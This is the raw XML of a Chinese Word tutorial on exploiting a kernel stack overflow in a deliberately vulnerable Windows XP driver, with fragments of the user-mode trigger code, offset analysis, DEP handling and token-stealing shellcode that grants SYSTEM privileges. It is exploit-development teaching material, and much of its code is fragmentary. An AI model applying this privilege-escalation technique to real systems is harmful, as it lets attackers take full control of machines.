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10BBC" w14:textId="4EABE4FE" w:rsidR="00FF60EB" w:rsidRPr="00FF60EB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72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>内核缓冲区溢出漏洞利用实现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>r3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>应用层进程提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337CC45E" w14:textId="1A12041C" w:rsidR="00FF60EB" w:rsidRDefault="00FF60EB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@p0sixB1ackCat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40345A06" w14:textId="77777777" w:rsidR="00FF60EB" w:rsidRDefault="00FF60EB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</w:p>
    <w:p w14:paraId="0A03EBE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利用思路：在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>下，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的长度做严格的检查，所以可以使用该函数对内核堆栈进行溢出，覆盖函数的返回地址，使</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri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指向我们自己构造的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跳板指令处。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="537EEB3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6B4C0998" w14:textId="59C01C48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0x00:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>首先验证猜想，对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函数进行验证，看是否有对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的长度、指针的合法性进行校验，异或是其他的安全检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09E0B4" w14:textId="680C98F8" w:rsidR="00697F62" w:rsidRPr="00697F62" w:rsidRDefault="00697F62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 wp14:anchorId="46554DEA" wp14:editId="519AF275">
            <wp:extent cx="5266055" cy="2776855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="../../../../../../../../var/folders/h6/vfnqvg6n00q7hbzbf3lmcqbm0000gn/T/com.evernote.Evernote/WebKitDnD.NHj9Mz/5F93AE84-8FD3-4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var/folders/h6/vfnqvg6n00q7hbzbf3lmcqbm0000gn/T/com.evernote.Evernote/WebKitDnD.NHj9Mz/5F93AE84-8FD3-42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0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5E6EA372" w14:textId="4BD1E934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上图中，可以发现，在上面的反汇编指令中，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函数的实现是直接使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">rep </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>movs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>串传送指令，直接将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缓冲区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到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55813B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9C1997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可以得出，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia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函数没有对des参数做任何的安全检查，但是，在copy之前，我们的目标驱动（要攻击的内核模块）会在copy之前使用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对des地址进行地址合法性校验，往后看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329269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0CBB8B0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0x01:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>接下来，编写含有漏洞的</w:t>
      </w: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驱动，以及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的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程序。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使用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通信触发攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D1BA0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35DB60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DriverUnload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>函数中，指定好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分发函数，并执行含有漏洞的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函数，在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函数中，执行了含有</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03E945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漏洞的代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D18CBA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44AC447" wp14:editId="0358ADBD">
            <wp:extent cx="6096000" cy="3996055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="TSTATUS UserBuffer, ULONG Size) &#10;PVOID &#10;NTSTATUS ntStatus = STATUS_SUCCESS; &#10;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STATUS UserBuffer, ULONG Size) &#10;PVOID &#10;NTSTATUS ntStatus = STATUS_SUCCESS; &#10;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2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0AA1D1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192A9D3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编写完之后，再来编写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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE717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7AB2EA4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0x02</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>：绕过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>DEP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>的非可执行区域引发的异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3AA4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我们的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到被标记为非可执行内存区域时，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>cpu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>将会引发异常，从而不会执行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，转而去执行异常处理例程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37883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但是，我们可以通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>VirtualAlloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>重新申请一段内存，并对该内存所在页标记为可执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3071381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28288B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R3的攻击代码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C41964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DWORD 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= 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EF8A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WCHAR *buffer = (WCHAR </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>malloc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(512*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366220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memset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(buffer,0x41,512*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033DD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printf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"Please press any key to send Attack!\n");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BBCC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getch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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C3679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DeviceIoControl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spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hDevice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66E291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CTL_PRINT, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEB52F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ADB8EB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23FF2EB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FB0F93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135512F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&amp;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41C6383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NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C68958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33DA2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其中，CTL_PRINT是r3指定的通讯方式：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7CD64E" w14:textId="77777777" w:rsidR="00C06777" w:rsidRDefault="00C06777" w:rsidP="00FF60EB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="0433FF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MYIOCTRL_CODE(</w:t>
      </w:r>
      <w:proofErr w:type="spell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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463655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color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr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CTL_</w:t>
      </w:r>
      <w:proofErr w:type="gram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 xml:space="preserve">FILE_DEVICE_UNKNOWN, </w:t>
      </w:r>
      <w:proofErr w:type="spell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IOCTRL_BASE+i</w:t>
      </w:r>
      <w:proofErr w:type="spell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, METHOD_NEITHER,FILE_ANY_ACCESS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D72D878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9E72C3E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CTL_HELLO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0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49906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CTL_PRINT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1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1D930E77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CTL_BYE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2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D9EACF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B5D7ED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这样，进入内核后，直接使用的就是环3的地址空间了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD8613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641643A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但是，这里出现了问题，也就是刚刚提到的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函数的指针合法性校验：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452E8B94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C0DEC3F" wp14:editId="3D2D1CC1">
            <wp:extent cx="9804400" cy="6612255"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9" name="图片 9" descr=" : 0001124A &#10;. text : 0001124C &#10;. text 000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: 0001124A &#10;. text : 0001124C &#10;. text 00011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76CC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AB3354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80F64A5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那么，就需要过掉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函数，才可以往后进行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2194D9D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函数会将第一个参数做为内存空间，做了如下检查：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66760D6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1、如果该地址范围超出环3，那么该函数引发STATUS_ACCESS_VIOLATION异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EC413E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2、如果该地址没有按照指定的内存对齐格式对齐，则引发STATUS_DATA_MISALIGNMENT异常。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578FBCCA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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404A865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既然非用户地址范围的空间会引发异常，那么就需要内核直接访问r3的buffer，基于do buffer和direct 的方式，IO管理器都会在内核空间开辟一段空间，并且将用户的buffer拷贝到该空间中，所以这两种方式的IO都不能过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0610CC9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deviceIoControl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 xml:space="preserve">的通讯方式是r3来指定的，也就是由我们的攻击程序来指定，so，neither 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io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4D848E0C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到了这里，我们过掉了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，并且向内核空间写入了我们的数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A451D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6B4F94D" wp14:editId="67CCA2A3">
            <wp:extent cx="7315200" cy="8991600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="8" name="图片 8" descr="egisters Disassembly Memory &#10;Command &#10;PBCKerne1StackOverF10w! sub 0123+Ox8e: &#10;D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isters Disassembly Memory &#10;Command &#10;PBCKerne1StackOverF10w! sub 0123+Ox8e: &#10;Dis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52C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357B0F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写入是写入进去了，但是并没有覆盖掉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（将0x41写入寄存器）：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D6899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08832BD" wp14:editId="740F493C">
            <wp:extent cx="7315200" cy="4165600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="ebugView on (local) &#10;File Edit Capture Options Computer Help &#10;Time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bugView on (local) &#10;File Edit Capture Options Computer Help &#10;Time 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802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BCA8E4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4C182F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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>UserBuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>长度增加到0x900在来运行一下，看一看效果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECA7F5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9797511" wp14:editId="138CC0CE">
            <wp:extent cx="6096000" cy="2870200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="图片 6" descr="ommand - Kernel 'com:port=com1,baud=115200' - Win[ &#10;f8daf6db 8be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mmand - Kernel 'com:port=com1,baud=115200' - Win[ &#10;f8daf6db 8be5 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3A9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到了这里，成功的将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覆盖掉了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8BB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FC08A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那么，现在，就要正确的找出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在函数栈帧中的offset，然后改写他们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880E2D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38B48C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逆向一下驱动，看一看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的offset：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417462C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9CD5815" wp14:editId="75B8EEC6">
            <wp:extent cx="6096000" cy="4885055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5" name="图片 5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F7D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877A54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当驱动进入该函数后，先将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入栈，然后</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>向上抬高了0x804的长度，那么，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的位置应该是：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010BDC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0x804 + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>sizeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>(DWORD)。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C4B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5AEC5B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将攻击函数改写一下，然后看一下是否可以命中：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE3D40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2AD1744" wp14:editId="556276ED">
            <wp:extent cx="6096000" cy="2014855"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="图片 4" descr="IZE T Size &#10;ULONCJ result &#10;— (512) * sizeof (ULONG) + sizeof (NTSTATUS) + sizeof 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ZE T Size &#10;ULONCJ result &#10;— (512) * sizeof (ULONG) + sizeof (NTSTATUS) + sizeof (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BC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6C3F31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重新编译，执行后，成功的命中了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：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7650B74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D79392A" wp14:editId="6E92DCA4">
            <wp:extent cx="6096000" cy="2616200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3" name="图片 3" descr="ommand - Kernel - WInDbg:6.11.0001.404 X8 &#10;cax,dword ptr [obp—804h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mmand - Kernel - WInDbg:6.11.0001.404 X8 &#10;cax,dword ptr [obp—804h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126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893041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下面，就来准备shellcode，并改写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中的内容为我们shellcode的指针。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B11885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2AA7D68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先来分析一下我们shellcode的功能：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DEEFD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找到windows系统进程system进程（</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>processId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 4），然后找到该进程的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>EProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>结构，拷贝该结构中的token成员到我们的攻击进程中，有了token，我们就可以欺骗操作系统，达到提权的目的了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA3ADF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455088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改写攻击函数，加入shellcode：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D345D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277E5C" wp14:editId="6D274FC8">
            <wp:extent cx="6096000" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2" name="图片 2" descr=" (((ULONG) Buffer + Size) &#10;sizeof (UL()NG &#10;shel ICode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(((ULONG) Buffer + Size) &#10;sizeof (UL()NG &#10;shel ICodeAddres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CF7E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在来将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的值改写为我们的shellcode地址，来看一看shellcode的实现：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756156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pushad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保存当前线程的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU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现场</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C80CBC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xor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</w:p>
    <w:p w14:paraId="5416F2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fs:[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CurrentThreadOffset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提取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>!_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KPCR.ProbData.CurrentThread</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0F5D3F9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获取当前进程的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结构地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075D613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eax;eax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后面会发生改变，用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来保存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24676142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edx,SystemPID</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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Fonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>;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  <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0AF87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找到当前进程所在的进程链表，获取下一个进程的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结构指针</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EBD99C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sub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从链表中找到下一个结点的地址后，在减去结点在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结构中的偏移，就得到了下一个进程的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的起始地址了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B07F55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cmp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ProcessIdOffset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比较当前进程的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pid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是否为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>systemPid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B5CB36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jne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</w:p>
    <w:p w14:paraId="5E5B15E3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>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67638A64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找到后，替换到我们的攻击程序中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C111D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popad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39D74EE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3FC063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重新编译，执行，挂</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>windbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>看一下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468701D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2CACFC" wp14:editId="04F506CF">
            <wp:extent cx="6096000" cy="6807200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="图片 1" descr="isassembly &#10;eax, eax &#10;ecx, eax &#10;Offset: &#10;079c2 &#10;b930000000 &#10;4079c7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sassembly &#10;eax, eax &#10;ecx, eax &#10;Offset: &#10;079c2 &#10;b930000000 &#10;4079c7 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304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成功的将system进程的process token拷贝到了我们的r3程序中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CB3DEE" w14:textId="77777777" w:rsidR="00344E8E" w:rsidRDefault="00344E8E"/>
    <w:sectPr w:rsidR="00344E8E" w:rsidSect="00EF6CA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777"/>
    <w:rsid w:val="00344E8E"/>
    <w:rsid w:val="00697F62"/>
    <w:rsid w:val="00C06777"/>
    <w:rsid w:val="00EF6CA4"/>
    <w:rsid w:val="00FF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53F8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7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C0677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9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431</Words>
  <Characters>2461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447756148@qq.com</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>447756148@qq.com</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-02-24T01:34:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-02-27T16:43:00Z</dcterms:modified>
</cp:coreProperties>
</file>